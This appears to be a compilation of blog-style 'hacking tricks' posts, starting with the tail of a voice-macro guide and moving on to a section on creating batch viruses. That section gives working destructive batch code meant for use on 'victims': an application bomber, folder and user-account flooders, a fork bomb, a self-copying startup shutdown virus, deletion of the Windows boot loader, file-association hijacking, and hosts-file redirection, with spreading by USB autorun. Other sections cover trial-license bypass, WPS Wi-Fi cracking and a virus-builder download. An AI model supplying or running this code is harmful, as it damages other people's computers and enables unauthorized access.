<listenFor>Pull up the weather in [CityName]</
listenFor>
<run command=" http://www.weather.com/
weather/local/{[CityName.zipCode]}"/ >
</command>
<command>
<listenFor>Is it cold in [CityName]?</
listenFor>
<speak>Let me check... just a moment.</
speak>
<script language="JScript">
<![CDATA[
<var xml_doc = new ActiveXObject
("Microsoft.XMLDOM");
<xml_doc.async = false;
<xml_doc.load(" http://www.rssweather.com/
zipcode/{[zipCode]}/rss.php");
<var titles = xml_doc.getElementsByTagName
("title");
<var descriptions =
xml_doc.getElementsByTagName
("description");
<Application.Speak(titles.item(2).text + " in
{[*CityName]}");
<Application.Speak(descriptions.item
(2).text);]]>
</script>
</command>
<listenForList name="CityName"
propname="zipCode">
<item propval="65201">Columbia</item>
<item propval="37201">Nashville</item>
</listenForList>
</speechMacros>
________________________________________________________________________________
_
A Macro To Restart The Computer :
You will just have to say "Nuke It!" and the
computer will restart :
________________________________________________________________________________
_
<speechMacros>
<command>
<listenFor>Nuke it</listenFor>
<speak>Rebooting The System.</speak>
<run command="C:\Windows
\System32\shutdown.exe" params="-r -t 00"/
>
</command>
</speechMacros>
________________________________________________________________________________
_
Another One To Shut Down The Computer :
You will have to say "Goodbye Jarvis" And the
Pc Will Shut Down :
________________________________________________________________________________
_
<speechMacros>
<command>
<listenFor>GoodBye Jarvis !</listenFor>
<speak>Getting Offline,Bye Sir</speak>
<run command="C:\Windows
\System32\shutdown.exe" params="-s -t 00"/
>
</command>
</speechMacros>
________________________________________________________________________________
_
Download This Pretty Little App And Extract It
To C:\NIR\ and you will add more intelligence
to your PC :
Volume Up:
<speechMacros>
<command>
<listenFor>volume up</listenFor>
<run command="C:\nir\nircmd.exe"
params="changesysvolume +5000"/>
<speak>Volume Up</speak>
</command>
</speechMacros>
________________________________________________________________________________
_
Volume Down:
<speechMacros>
<command>
<listenFor>volume down</listenFor>
<run command="C:\nir\nircmd.exe"
params="changesysvolume -5000"/>
<speak>Volume Down</speak>
</command>
</speechMacros>
________________________________________________________________________________
_
Volume Medium :
<speechMacros>
<command>
<listenFor>volume medium</listenFor>
<run command="C:\nir\nircmd.exe"
params="setsysvolume 30000"/>
<speak>Volume at medium listening level</
speak>
</command>
</speechMacros>
________________________________________________________________________________
_
For More Interactivity, install Voice Search on
Google chrome or some similar app in Firefox !

Batch Files -The Arts Of Creating Viruses

I could just you give the codes to paste in
notepad and ask you to save files with
extension .bat and your deadly batch
viruses would be ready. But instead of that,
I have focused on making the basics of
batch files clear and developing the
approach to code your own viruses.
What are Batch Files ?
Lets begin with a simple example , Open
your command prompt and change your
current directory to 'desktop' by typing 'cd
desktop' without quotes.
Now type these commands one by one
1. md x //makes directory 'x' on desktop
2. cd x // changes current directory to 'x'
3. md y // makes a directory 'y' in directory
'x'
We first make a folder/directory 'x', then
enter in folder 'x',then make a folder 'y' in
folder 'x' .
Now delete the folder 'x'.
Lets do the same thing in an other way.
Copy these three commands in notepad
and save file as anything.bat
Now just double click on this batch file and
the same work would be done , You will get
a folder 'x' on your desktop and folder 'y' in
it. This means the three commands executed
line by line when we ran the batch file
So a batch file is simply a text containing
series of commands which are executed
automatically line by line when the batch
file is run.
What can batch viruses do ?
They can be used to delete the windows
files,format data,steal information,irritate
victim, consume CPU resources to affect
performance,disable firewalls,open
ports,modify or destroy registry and for
many more purposes.
Now lets start with simple codes, Just
copy the code to notepad and save it as
anything.bat (I am anything you wish but
extension must be bat and save it as 'all
files' instead of text files).
Note: Type 'help' in command prompt to know
about some basic commands and to know
about using a particular command , type
'command_name /?' without quotes.
1. Application Bomber
@echo off // It instructs to hide the
commands when batch files is executed
:x //loop variable
start winword
start mspaint //open paint
start notepad
start write
start cmd //open command prompt
start explorer
start control
start calc // open calculator
goto x // infinite loop
This code when executed will start open
different applications like
paint,notepad,command prompt repeatedly,
irritating victim and of course affecting
performance.
2. Folder flooder
@echo off
:x
md %random% // makes directory/folder.
goto x
Here %random% is a variable that would
generate a positive no. randomly. So this
code would make start creating folders
whose name can be any random number.
3.User account flooder
@echo off
:x
net user %random% /add //create user
account
goto x
This code would start creating windows
user accounts whose names could be any
random numbers.
3.Shutdown Virus
copy anything.bat “C:\Documents and
Settings\Administrator\Start Menu\Programs
\Startup”
copy anything.bat “C:\Documents and
Settings\All Users\Start Menu\Programs
\Startup” //these two commands will copy
the batchfile in start up folders (in XP)
shutdown -s -t 00 //this will shutdown the
computer in 0 seconds
Note : Files in Start up folder gets started
automatically when windows starts . You
should first two lines of code in every virus
code so that it would copy itself in startup
folder. Start up folder path in Windows 7 is
C:\Users\sys\AppData\Roaming\Microsoft
\Windows\Start Menu\Programs\Startup
Everytime the victim would start the
computer, the batch file in start up would
run and shutdown the computer
immediately. You can remove this virus by
booting the computer in Safe Mode and
deleting the batch file from Start Up folder.
4. Deleting boot files
Goto C drive in Win XP , Tools->Folder
Option->View
Now Uncheck the option 'Hide operating
system files' and check option 'Show hidden
files and folders'. Click apply
Now you can see the operating system files.
There is a one file 'ntldr' which is boot
loader used to boot the windows.
Lets make a batch file to
delete this file from victim's computer and
the windows will not start then.
attrib -S -R -H C:\ntldr // -S,-R,-H to clear
system file attribute, read only attribute ,
hidden file attribute respectively
del ntldr //delete ntldr file
After running this batch file , system will
not reboot and a normal victim would
definitely install the windows again.
5. Fork Bomb
%0|%0 //Its percentage zero pipe
percentage zero
This code creates a large number of
processes very quickly in order to saturate
the process table of windows. It will just
hang the windows .
6. Extension Changer
@echo off
assoc .txt=anything // this command
associates extension .txt with filetype
anything.
assoc .exe=anything
assoc .jpeg=anything
assoc .png=anything
assoc .mpeg=anything
Every extension is associated with a filetype
like extension ‘exe’ is  is associated with
filetype ‘exefile’. To see them, just enter
command ‘assoc’ in command prompt.
Above code changes the association of some
extensions to filetype ‘anything’ (means u
can write anything) which obviously
doesn’t exist. So all exe
(paint,games,command prompt and many
more),jpeg,png,mpeg files wudn’t open
properly.
7. DNS Poisoning
There is a file called ‘hosts’ located at c:
\windows\system32\drivers\etc. We can
place a website and an IP in front of it. By
doing this, we want our web browser to
take us to host located at that IP when that
website name would be entered. I mean
request to resolve IP of website is not sent to
Domain Name Server(DNS) if the name of
website in hosts file.
@echo off
echo xxx.xxx.xxx.xxx www.anything.com >
C:\windows\system32\drivers\etc\hosts //
this command prints or add xxx.xxx.xxx.xxx.
www.anything.com in hosts file.
Replace xxx.xxx.xxx.xxx  and
www.anything.com with IP address and
website of your choice. You can take/
redirect victim to any host located at
specific IP when he would try to log on to
specific website or u can simply block any
website by entering its name and any
invalid IP address.
.
Spreading batch viruses through pen
drive -:
Step 1.
Open notepad and write
[autorun]
open=anything.bat
Icon=anything.ico
Save file as ‘autorun.inf’
Step 2. Put this ‘autorun.inf’ and your
actual batch virus ‘anything.bat’ in
pendrive .When the victim would plug in
pen drive,the autorun.inf will launch
anything.bat and commands in batch file
virus would execute.

Create a Virus Without coding SONIC BAT

DOWNLOAD FROM THE GIVEN LINK BELOW
AND SPREAD YOUR VIRUS, Make sure
also you download the batch to exe
converter in the previous post so
that you can convert and icon to
your virus
Download Here

All Keyboard Shortcuts

1. Windows key + R = Run menu
2. This is usually followed by:
3. cmd = Command Prompt
4. iexplore + "web address" = Internet Explorer
5. compmgmt.msc = Computer Management
6. dhcpmgmt.msc = DHCP Management
7. dnsmgmt.msc = DNS Management
8. services.msc = Services
9. eventvwr = Event Viewer
10. dsa.msc = Active Directory Users and
Computers
11. dssite.msc = Active Directory Sites and
Services
12. Windows key + E = Explorer
13. ALT + Tab = Switch between windows
14. ALT, Space, X = Maximize window
15. CTRL + Shift + Esc = Task Manager
16. Windows key + Break = System properties
17. Windows key + F = Search
18. Windows key + D = Hide/Display all windows
19. CTRL + C = copy
20. CTRL + X = cut
21. CTRL + V = paste

Steps to Hack the Software and Run the Trial Program Forever

You will have to follow these tips carefully to
successfully hack a software and make it run
in the trial mode forever:
1. Note down the date and time, when you install
the software for the first time.
2. Once the trial period expires, you must always
run the software using RunAsDate.
3. After the trial period is expired, do not run the
software(program) directly. If you run the
software directly even once, this hack may no
longer work.
4. It is better and safe to inject the date of the
last day in the trial period.
For example, if the trial period expires on jan
30 2009 , always inject the date as jan 29
2009 in the RunAsDate. I hope this helps!
Download here

Spoofing MAC Address on Android Devices

Even though MAC address is embedded on the
hardware device during manufacture, it can
still be spoofed to input a new one of your
choice. Here is a detailed instruction on how
to spoof MAC address on your Android phone.
Before you spoof the MAC address, you need
to record the original/current MAC address of
your device which can be done according to
the instruction below:
On the Home Screen of your phone,
tap Menu button and go to Settings.
Tap About Device and go to Status
Now scroll down to record the 12-digit code
shown under Wi-Fi Mac address . An address
would read something like:
Example MAC address: E5:13:D8:E5:69:97
1. Rooted Android Phone
2. BusyBox app installed on your phone
3. Once BusyBox is installed, you need to
install Terminal app
Once the above requirements are satisfied,
follow the instructions below to spoof your
MAC address:
1. Open the Terminal app and type the
commands as listed below:
$ su [HIT ENTER]
$ busybox iplink show eth0 [HIT ENTER]
(This will show your current MAC address, just
for your confirmation)
2. Now, type the following command:
$ busybox ifconfig eth0 hw
ether XX:XX:XX:XX:XX:XX [HIT ENTER]
(In the above command, replace
XX:XX:XX:XX:XX:XX with your new MAC
address)
3. You have now spoofed your MAC address
successfully. To check for the change enter the
following command again:
$ busybox iplink show eth0 [HIT ENTER]
(Now you should see your new MAC address)

How to Create MultiBoot USB ( Windows | Kali Linux)

Benefits of Multiboot USB
Freedom – Select between multiple OS’s on
boot time. No need to install OS’s one by
one from USB as traditional USB boot
creator programs like Unetbootin and
others limited user to install single OS on a
USB at a time.
Live USB – Most Linux distributions can be
tested without installing on system.
#LinuxLove
Persistence – All the commands executed
in terminal or files copied/downloaded
vanishes when the live OS restarts.
Persistence feature gives the power to hold
the data/information on the Live USB even
if the system is restarted .
Rescue Disk – Anti-virus program like
Kaspersky, Norton, AVG etc provides
bootable ISO file with latest virus
definitions that allows a user to rescue
their system when critically infected by
viruses. In case when system does not boot
up , rescue disk is very helpful.
[YB]Checkout my new store for Best WiFi
adapters for Hacking, Best-selling Pentesting
Books and Best WiFi Boosters: Rootsh3ll
rStore[/YB]
Tools required
YUMI ( Your Universal Multiboot Installer ) –
A tool that allow a user to create bootable
USB ( Pen Drive | Flash Drive ) with multiple
OS’s ( Operating Systems ) installed from an
ISO file for each.
It is download-and-execute program i.e You
do not need to install it anyway. Just
download and run the file.
you can download latest version of YUMI from
their Official site : www.pendrivelinux.com
How to Create MultiBoot USB?
1. Start the YUMI program and click “ I Agree“.
2. Select your USB from the Drop-Down menu.
F:\ (MULTIBOOT) in my case.
3. Now click the Drop-Down menu and select
“ Windows Vista/7/8 Installer ” then click
browse and select the ISO file.
[ Optional ] – You may also format the
drive by selecting the Format checkbox .
4. Click next then Yes . Wait for the Process
to complete
5. When the program completes it will ask
you for adding another Distribution i.e
Operating System
click “ Yes” if you want to add another
Operating System
else Click No and Close.
Installing Kali Linux on USB
Step 2: Select the “Kali Linux” from the Drop-
Down menu and select your Kali Linux ISO file.
Repeat Step 3 onwards.
NOTE: USB Partition type MUST BE FAT32 . If
you are Using multiple OS on USB drive.
If installing only Windows then NTFS Partition
will work fine.
Kali Linux Installation (Detect and Mount CD-
ROM Fix)
It was seen that Kali Linux is showing error
while installation unlike other Linux
distribution.
So here is a solution you can use any time
using your Multiboot USB
When you see this error screen
Click continue and it show you a list of
options.
Go for “Execute a shell “. Click Continue
Execute a shell
Now type the following
and check for / dev/sdb1 , most probably it
should be / media
NOTE: In my case I have been using Kali 2.0
64-bit. Yours can be different. Use appropriate
version. In case you don’t know just press
< TAB> after / media/multiboot/kali-linux- to
check for auto completion.
What we have actually done is that we have
removed the contents for / cdrom directory and
linked the kali-linux-2.0-amd / content to /
cdrom directory using ln command.
This tricked the installer into thinking the files
on the USB thumb drive were located on an
installer CD. The issue will be resolved and the
installer will be able to proceed past the point
it was stuck at.
Now you can continue with the installation
simply
Conclusions
Now you have Windows ,Linux and/or Anti-
virus Rescue disk on your USB drive.You can
boot it on any system.
Simply plug-in your USB ,Re/start the system
and set your USB as first Boot priority and
install Windows from USB or run Live Linux

How to Hack DNS For Faster Internet Speed Upto 120% ?

Steps to Hack DNS For
Faster Internet Speed :
1. Go to Control Panel >> Network and
Internet Option >> Network Sharing
Center .
2. Now Click on Internet Connection by Which
you using Internet and this Will Open your
Internet Status.
3. Now go to Properties and Scroll Down and
Double Click on Internet Protocol Version
4 (IPv4 ).
4. Now Property Box will Open and you see
Their is Option of DNS Servers Just Choose
“Use the Following DNS Adderss” and
Enter these Addresses
>> Preferred DNS server:
208.67.222.222
>> Alternate DNS server: 208.67.220.220
5. Now Time to Configure Internet Protocol
Version 6 (IPv6) again Repeat Previous Steps
to Open DNS Properties and Enter These
Addresses in DNS Fields.
>> Preferred DNS server: 2620:0:ccc::2
>> Alternate DNS server: 2620:0:ccd::2
6. Click Ok and Save all DNS Settings and Time
to Access the Faster Internet.

Creating Penetration testing lab with DVWA : Full tutorial

What is Penetration Testing ?
Penetration testing is a practice of learning
hacking skills against Web Applications,
Mostly White hat hackers or IT Security Team
create a Penetration lab to practice their
hacking tools, tricks and even to prevent
hacking. Even beginner hacker also want to
learn hacking skills like SQL Injection, XSS,
CSRF attack etc, this all hacking tricks require
a vulnerable website to Explode the
Vulnerability and to learn hacking skill
What is DVWA ? (Damn Vulnerable Web App)
Damn Vulnerable Web App (DVWA) is a PHP/
MySQL web application that is damn
vulnerable. Its main goals are to be an aid for
security professionals to test their skills and
tools in a legal environment, help web
developers better understand the processes of
securing web applications and aid teachers/
students to teach/learn web application
security in a class room environment.
Let's Get Stated
1. Download DVWA HERE- > DVWA
2.Download Xamp here > Xamp
3.After Download Both File install Xamp and
open control panel and start Apache and
MySQL
4. Extract Dvwa in C:\xampp\htdocs
5.goto C:\xampp\htdocs\dvwa\config and
open the config.inc file with notepad or
notepad++
check in line 20 cleac the p@ssword and leave
only ' ' [quotation] save the file.
6. Open your browser and type localhost/dvwa
>create database.
then your done.....
7. in the same browser just open Ntab and
type: http://localhost/dvwa/Login.php
username :admin
password : password...
For Educational Purpose only

Hack WiFi Using Android

1]Root a compatible device. Not every Android
phone or tablet will be able to crack a WPS
PIN. The device must have a Broadcom
bcm4329 or
bcm4330 wireless chipset, and must be rooted
. The
Cyanogen ROM will provide the best chance of
success. Some of the known supported devices
include:
Nexus 7
Galaxy S1/S2/S3
Nexus One
Desire HD!!
2]Download and install bcmon. This tool
enables
Monitor Mode on your Broadcom chipset,
which is essential for being able to crack the
PIN.
The bcmon APK file is available for free from
the
bcmon page on the Google Code website.
To install an APK file, you will need to allow
installation from unknown sources in your
Security menu.
3]Run bcmon. After installing the APK file, run
the app. If prompted, install the firmware and
tools. Tap the "Enable Monitor Mode" option.
If the
app crashes, open it and try again. If it fails
for a
third time, your device is most likely not
supported.
Your device must be rooted in order to run
bcmon.
4] Download and install Reaver. Reaver is a
program developed to crack the WPS PIN in
order to retrieve the WPA2 passphrase. The
Reaver
APK can be downloaded from the developers'
thread on the XDA-developers forums.
5] Launch Reaver. Tap the Reaver for Android
icon in your App drawer. After confirming that
you are no using it for illegal purposes, Reaver
will
scan for available access points. Tap the
access
point you want to crack to continue.
You may need to verify Monitor Mode before
proceeding. If this is the case, bcmon will
open again.
6] Verify your settings. In most cases you can
leave the settings that appear at their default.
Make sure that the "Automatic advanced
settings"
box is checked.
7] Start the cracking process. Tap the "Start
attack" button at the bottom of the Reaver
Settings menu. The monitor will open and you
will
see the results of the ongoing crack displayed.
Cracking WPS can take anywhere from 2-10+
hours to complete, and it is not always
successful.!!!!!

How to Speed Up Computer 2015 ? [Boost PC Speed]

Steps to Speed Up Computer  :
1. Open Search Bar of Windows and Find
“Run” and Type “msconfig” in it and Hit
Enter.
2. After that a Small Dialog Box will Open.
3. Go to Services Tab and First Hide all
Microsoft services.
4. Now you see many of the Services Running
by you Software that you Installed on
Computer. These software consume your
RAM and running their Process in
Background.
5. Now Unselect these Services that you not
want to run.
6. Now Jump to “Startup” Tab and you can
see There is Task Manager Option Because
in Newer Version of Windows they add
Startup menu in Task Manager.
7. So Click on it and open Task Manager and
in Startup Tab you can see some Application
that Active when your Computer Starts.
8. Right Click on it and Disable Those Startup
Programs .
Additional Tricks to Speed
Your PC Speed :
1. Right Click on “My Computer” from Left
Side Click “Advanced System Setting” .
2. Under Performance Tab Click “Settings” .
3. Now Select “Adjust For Best Performance”
and Click Apply.
4. This Will Disable all of Your Graphics of
Windows that help you to save Memory
Usage.

How to Speed Up USB Transfer Rate in Windows?

1. Plugin Your USB Pen Drive / Flash Drive.
Open My Computer locate your Flash Drive.
2. Right Click on Flash Drive Click on Format
Option.
3. On the Next Screen, Formatting Dialog Box
will Open Where You need to Set File
System as ‘NTFS’ and Set Allocation Unit
Size ‘Default Allocation Size’ and Uncheck
the ‘Quick Format’ .
4. Now Click on ‘Start Button’ and Then OK.
5. Wait for a Minute It can Format your USB
Flash Drive, Don’t Turn Off your Computer
and Unplug your Flash Drive.
6. After Formatting your Pen Drive it Show
the Confirmation Dialog Box Select Ok and
Close the Format Dialog Box.

How To Run WhatsApp and Any App On College Wi- Fi ?

1. Firstly, Download “ DotVPN – Better than
VPN “ App from Google Play Store ( Here ).  
2. After Downloading this App They ask you to
Sign up in it. Just Sign up.
3. Now when your Enter the Details It
automatically Connected to Proxy Servers.
4. It also Offer a new User to 7 Day Free
Turbo Speed Trail.
5. You can Change your Country Location by
Tap the Bottom Button.
6. Please Wait when it is in Progress to
Changing your Location.
7. When It Turns into Blue Screen It means it
is Successfully Connected.
8. Now you can Easily Access WhatsApp,
Facebook Messenger, Hike, Viber and any
Other Social Apps through your College Wi-
Fi.

U can try other vpns also...
Like droid vpn
Troidvpn
Operamax
Open vpn
Hotspot shield vpn.
Etc & many more  .

How To Control Android Device From Your PC

1. Go To Google Play Store and Search
“AirDroid App” & Install on your Android
Device.
2. After Installing Open AirDroid and You can
see a IP Address with Port Number.
3. Open Your Browser in Computer and Type
that IP Address with Port Number and Hit
Enter. (Your Computer & Android Device is
Connected to Same Wi-Fi) .
4. When You Hit that IP on your Browser you
Receive a Confirmation on your Android
Device Just Click “Accept” and Your
Android Device Interface is Show on your
Computer Screen Via AirDroid.
5. When you Hit that Accept Button Your
Android Phone Emulate on your Computer
Screen and You can Make Change in Your
Android Phone from Your Computers. For
Example You can Check Messages, Calls,
Move Files etc. You can see the AirDroid
Interface for your Android Phone Like
Below Picture.
6. Enjoy AirDroid, Transfer Files, Images and
Videos from Your Computer to Android
Device & Device to Computer Easily without
any Wires and Data Cables.

Instructions To Increase Internal Memory Of Android Phone With Link2SD

1.You have done the partitioning of SD card.
So, now it’s time to download and install the
latest version of the app. (In case, if you not
installed the app previously as I have said in
the prerequisites).
2.Next grant the superuser permission for the
Link2SD app.
3.After granting the superuser permission, it
will ask you to select the file system of your
second partition. Just, choose the select ext2
format as given in the below picture.
4.Once you confirmed the file system, it will
ask you to restart your android phone. So, do
it instantly.
5.Once your phone is restarted, again open
the Link2SD app and select the filter
optionand choose the “On Internal” option as
given in the below picture.
6.Once you chosen that option it will show the
apps from the internal memory.
7.Select the options > Multi select. Finally
choose the applications that you want to
move to the internal memory.
8.Now, again choose the action and then
create the link. Choose all the three options
i.e Link application file, Link dalvik cache file
and Link library files and tap OK.
9.It will take some time to create the link to
this partition. Once it was created press OK.
That’s it! all your applications will be moved
to this partition.
10.In order to link every new app that you will
download to this partition, choose the options
and then again choose auto link .
11.Hereafter, whenever you download the app
either from the android market or from the
Google Play Store it will get saved in this
partition.
If you want to check the status of the partition
memory select option > Storage info. Don’t
remove the memory card from your android
phone as your apps will be linked to the SD
card and by removing it, you cannot access
them.
That’s it. Now you have partitioned the SD
card and used it to increase Internal memory
of Android phone.

How To Partition The Memory Card And Increase Internal Memory Of Android Phone

1.To proceed with the process you need to
root your android smartphone. In case, if you
are not sure whether your android phone is
rooted or not, just download the ‘Root
Checker‘ app from the Google Play Store. If it
is not rooted, then root your android phone
instantly by following the tutorial’s given here
in our website.
2.Next, backup all your data’s available on
your android smartphone, as the partition
process will wipe it all.
3.Next download and install
the ‘Link2SD‘ app from the Google Play Store
on your phone.
4.As I have already said, this procedure
requires the ClockworkMod recovery and you
must have it installed on your android device.
Try to install the latest version of
the Clockwork Mod recovery.
5.Finally, check the battery percentage level of
your android phone and make sure it is not
less than 75%. If it is less, then charge your
phone fully or up to 75%.

Procedure to Partition The
Memory Card:

1.First switch off your android phone and boot
it into recovery mode by following any method
or by using the key combination.
2.The Touch doesn’t work in most of the
Clockworkmod recovery, so use home button
for selection and volume buttons for
navigation.
3.Then choose the “advanced option” and
then go to partition SD card.
4.After that, select the ext size (Make sure it
is less than your memory card size).
5.The SD Card partition will begin and it will
take some time. So, wait until the process is
finished.
6.After that choose the +++++ Go Back
+++++ option and reboot your device.

Real meaning of HACKRR & CRACKER

HACKER haku(r) -
1. A programmer who breaks into computer
systems in order to steal or change or destroy
information as a form of cyber-terrorism
2.One who works hard at boring tasks
3.Its is also a term used by some to mean ''a
clever programmer''. "A good hack" is a clever
solution to a programming problem and
"Hacking" is the art of doing it.
Here are five possible character that qualify
one as a hacker :
1. A person who enjoys learning details of a
programming language or system.
2. A person who enjoys actually doing the
programming rather than just theorizing about
it
3. A person capable of appreciating someone
else's hacking
4. A person who picks up programming
quickly
5. A Person who is an expert at a particular
programming language or system ,as in "Unix
Hacker".
      CRACKER kraku(r)
* A programmer who cracks (gains
unauthorized access to) computers, typically
to do malicious things.
"crackers are often mistakenly called hackers"
* A cracker is someone who break into
someone else's computer system, often on a
network; bypasses password or licenses in
computer programs;
or in other ways intentionally breach computer
security.

Expand Ram using Reohsoft Ram EXPANDER

1. Root Your Android Phone.
2. Check you android to confirm if its
successfully root or not using Root Checker
3. download and install REOHSOFT RAM
EXPANDER Playstore or just "Google" it
4. run  REOHSOFT make sure you allow to access
to  su / super user;
5. Now open the app and enable SWAP Active to
create a SWAP file.
6. When it is finished, just click on the Grey
Colored Box and activate the swap file
created. After the process is finished, you will
get this massage: “Congratulations you have
successfully increased the RAM of your
Android smartphone ”
7. Reboot / RESTART your ANDROID Device &
YOU r  Done

How to Control your PC with your Android Phone ?

1. First You Need to Install Google Chrome
Extension called “Chrome Remote
Desktop” and Installed in your Chrome
Browser.
2. You also Need to Install “Remote Desktop”
App in your Android Phone. Now Its Turn to
Connect with each Other.
3. You need to Connect Both Devices to a
Common Wi-Fi Router / Modem to make
Connection Between your Android Device
and Computer.
4. Now Come to your Computer and Run that
Extension from App Manager and You See
Screen Like this.
5. Click on Get Started and they Authorize
your from your Google Account. Once your
Conform that Now you see the Green
“Share” Button.
6. When your Click on Green “Share Button”
a Google Host Controller automatically Start
download Just install it on your Computer.
7. Now Again Click on “Share” Button and
You generate a 12 Digit Pin Code. Note
Down or Copy that code.
8. Now in Below Block of “My Computer”
section Click ‘Get Started’ and they show
you the Authorize Box Click “Continue” .
9. You show a Screen to Create your own PIN
for Security purpose.
10. Now It Enables the Connection in your
Computer and Your Computers are shown in
My Computers Section.
11. Now Click on “Access” and Enter the 12
Digits Code in it and Hit Enter. (That Code
automatically Generated by System).
12. Open Your “Remote Desktop” app in your
Phone and you can see the Computers Click
on it and you can see your Full Computer
Screen is on your Android Phone.
13. Now You Now Easily Connect with your
Computer anytime in your Home or any
Specific Area Where you share a Common
Wi-Fi Connection.

THREATS TO NETWORK SECURITY

1. Viruses : Computer programs written by
devious programmer and design to replicate
themselves and infect computers when
triggered by specific event.
2. Trojan horse programs : Delivery vehicles
for destructive code, which appear  to be
harmless or useful software programs such as
games.
3. Vandals -. Software applications or applets
that cause destruction
4. Attack : Including Reconnaissance attacks
(info -gathering activities to collect data that
is later use to compromised the networks);
access attack (exploit network vulnerability in
order to gain entry to e-mail,database or the
corporate network;
5.Denial - Of - Service attack ( which all
hacker to shutdown or crash the server)
6. Data Interception : Involves eavesdropping
on communications or altering data packets
being transmitted.
7. Social Engineering : Obtaining Confidential
network security information through
nontechnical means, such as posing as a
technical support person and asking for
people's password.

Hacker words to understand

Adware: Adware can mean the software that
automatically generates advertisements in a
program that is otherwise free, such as an
online video game. But in this context it more
commonly means a kind of spyware that
tracks your browsing habit covertly to
generate those ads.
Anonymous: A non-hierarchical hacktivist
collective, Anonymous uses hacking (and
arguably cracking) techniques to register
political protest in campaigns known as
“#ops.” Best known for their distributed denial
of services (DDoS) attacks, past activities have
included attacks against the Church of
Scientology; Visa, Paypal, and others who
withdrew their services from WikiLeaks’ Julian
Assange after that group began releasing war
documents; #OpTunisia and others purporting
to support the Arab Spring; and a campaign
that brought down the website of the
Westboro Baptist Church. #Ops are usually
marked with the release of a video of a reader
in a Guy Fawkes mask using a computer
generated voice. Offshoot groups include
AntiSec and LulzSec.
AntiSec: An Anonymous splinter group,
AntiSec was best known for the hack of
security firm Stratfor, publishing credit card
numbers and email addresses taken from the
company’s site. Jeremy Hammond was
arrested for alleged Anti-Sec activities under
the alias sup_g.
Back door: A back door, or trap door, is a
hidden entry to a computing device or
software that bypasses security measures,
such as logins and password protections.
Some have alleged that manufacturers have
worked with government intelligence to build
backdoors into their products. Malware is
often designed to exploit back doors.
Black hat:  Black hat hackers are those who
engage in hacking for illegal purposes, often
for financial gain, though also for notoriety.
Their hacks (and cracks) result in
inconvenience and loss for both the owners of
the system they hack and the users.
Bot: A program that automates a usually
simple action so that it can be done
repeatedly at a much higher rate for a more
sustained period than a human operator could
do it. Like most things in the world of
hacking, bots are, in themselves, benign and
used for a host of legitimate purposes, like
online content delivery. However, they are
often used in conjunction with cracking, and
that’s where its public notoriety comes from.
Bots can be used, for instance, to make the
content calls that make up denial of service
attacks. Bot is also a term used to refer to the
individual hijacked computers that make up a
botnet.
Botnet: A botnet is a group of computers
controlled without their owners’ knowledge
and used to send spam or make denial of
service attacks. Malware is used to hijack the
individual computers, also known as
“zombies,” and send directions through them.
They are best known in terms of large spam
networks, frequently based in the former Soviet
Union.
Brute force attack:  Also known as an
exhaustive key search, a brute force attack is
an automated search for every possible
password to a system. It is an inefficient
method of hacking compared to others like
phishing. It’s used usually when there is no
alternative. The process can be made shorter
by focusing the attack on password elements
likely to be used by a specific system.
Clone phishing: Clone phishing is the
modification of an existing, legitimate email
with a false link to trick the recipient into
providing personal information.
Code: Code is the machine-readable, usually
text-based instructions that govern a device
or program. Changing the code can change
the behavior of the device or program.
Compiler: A compiler is a program that
translates high-level language (source code in
a programming language) into executable
machine language. Compilers are sometimes
rewritten to create a back door without
changing a program’s source code.
Cookie: Cookies are text files sent from your
Web browser to a server, usually to customize
information from a website.
Cracking: To break into a secure computer
system, frequently to do damage or gain
financially, though sometimes in political
protest.
Denial of service attack (DoS): DoS is used
against a website or computer network to
make it temporarily unresponsive. This is
often achieved by sending so many content
requests to the site that the server overloads.
Content requests are the instructions sent, for
instance, from your browser to a website that
enables you to see the website in question.
Some have described such attacks as the
Internet equivalent of street protests and some
groups, such as Anonymous frequently use it
as a protest tool.
Distributed denial of service attack (DDoS): A
DoS using a number of separate machines.
This can be accomplished by seeding
machines with a Trojan and creating a botnet
or, as is the case with a number of
Anonymous attacks, by using the machines of
volunteers.
Doxing: Discovering and publishing the
identity of an otherwise anonymous Internet
user by tracing their online publically
available accounts, metadata, and documents
like email accounts, as well as by hacking,
stalking, and harassing.
Dumpster Diving : The act of rummaging
through the trash of an individual or business
to gather information that could be useful for
a cyber criminal to gain access to a system or
attain personal information to aid them in
identity theft or system intrusion. One
person’s garbage can indeed be a cyber
criminal’s treasure.
Easter Egg : A non-malicious surprise
contained in a program or on a circuit board
installed by the developer. It could be as
simple as a text greeting, a signature, or an
image embedded on a circuit board, or
comprise a more complex routine, like a video
or a small program. The criteria that must be
met to be considered an Easter Egg are that it
be undocumented, non-malicious, reproducible
to anyone with the same device or software,
not be obvious, and above all – it should be
entertaining!
Firewall:  A system using hardware, software,
or both to prevent unauthorized access to a
system or machine.
Gray hat: Just like the rest of life, hacking is
often less black or white than it is gray. The
term gray hat hacker reflects that reality. A
gray hat hacker will break the law in the
pursuit of a hack, but does not do so
maliciously or for personal gain. Many would
argue Anonymous are gray hats.
Hacking: Hacking is the creative
manipulation of code, distinguished, albeit
amorphously, from programming by focusing
on the manipulation of already written code in
the devices or software for which that code
was already written. Metaphorically it extends
to social engineering in its manipulation of
social code to effect change. Many prefer to
use the term cracking to describe hacking into
a machine or program without permission.
Hackers are sometimes divided into white hat,
black hat, and gray hat hackers.
Hacktivist: A hacker whose goals are social
or political. Examples range from reporting
online anonymously from a country that
attacks free speech to launching a DDoS
campaign against a company whose CEO has
issued objectionable statements. Not to be
confused with slacktivism, which refers to
push-button activism in which a supporter of
a social or political campaign’s goals does
nothing but register their support online, for
instance by “liking” a Facebook page.
Hash: A hash is a number generated by an
algorithm from a string of characters in a
message or other string. In a communications
system using hashes, the sender of a message
or file can generate a hash, encrypt the hash,
and send it with the message. On decryption,
the recipient generates another hash. If the
included and the generated hash are the
same, the message or file has almost certainly
not been tampered with.
IP: Internet protocol address. It’s the
distinctive numeral fingerprint that each
device carries that’s connected to a network
using Internet Protocol. If you have a device’s
IP you can often identify the person
using it, track its activity, and discover its
location. These addresses are apportioned by
the regional Internet registries of the IANA
(the Internet Assigned Numbers Authority).
Crackers can use knowledge of your IP address
to your computer via one of its ports, the
points that regulate information traffic flow.
IRC: Internet relay chat is a protocol used by
both groups and for one-on-one
conversations. Often utilized by hackers to
communicate or share files. Because they are
usually unencrypted, hackers sometimes use
packet sniffers to steal personal information
from them.
Keystroke logging:  Keystroke logging is the
tracking of which keys are pressed on a
computer (and which touchscreen points are
used). It is, simply, the map of a computer/
human interface. It is used by gray and black
hat hackers to record login IDs and
passwords. Keyloggers are usually secreted
onto a device using a Trojan delivered by a
phishing email.
Logic bomb: A virus secreted into a system
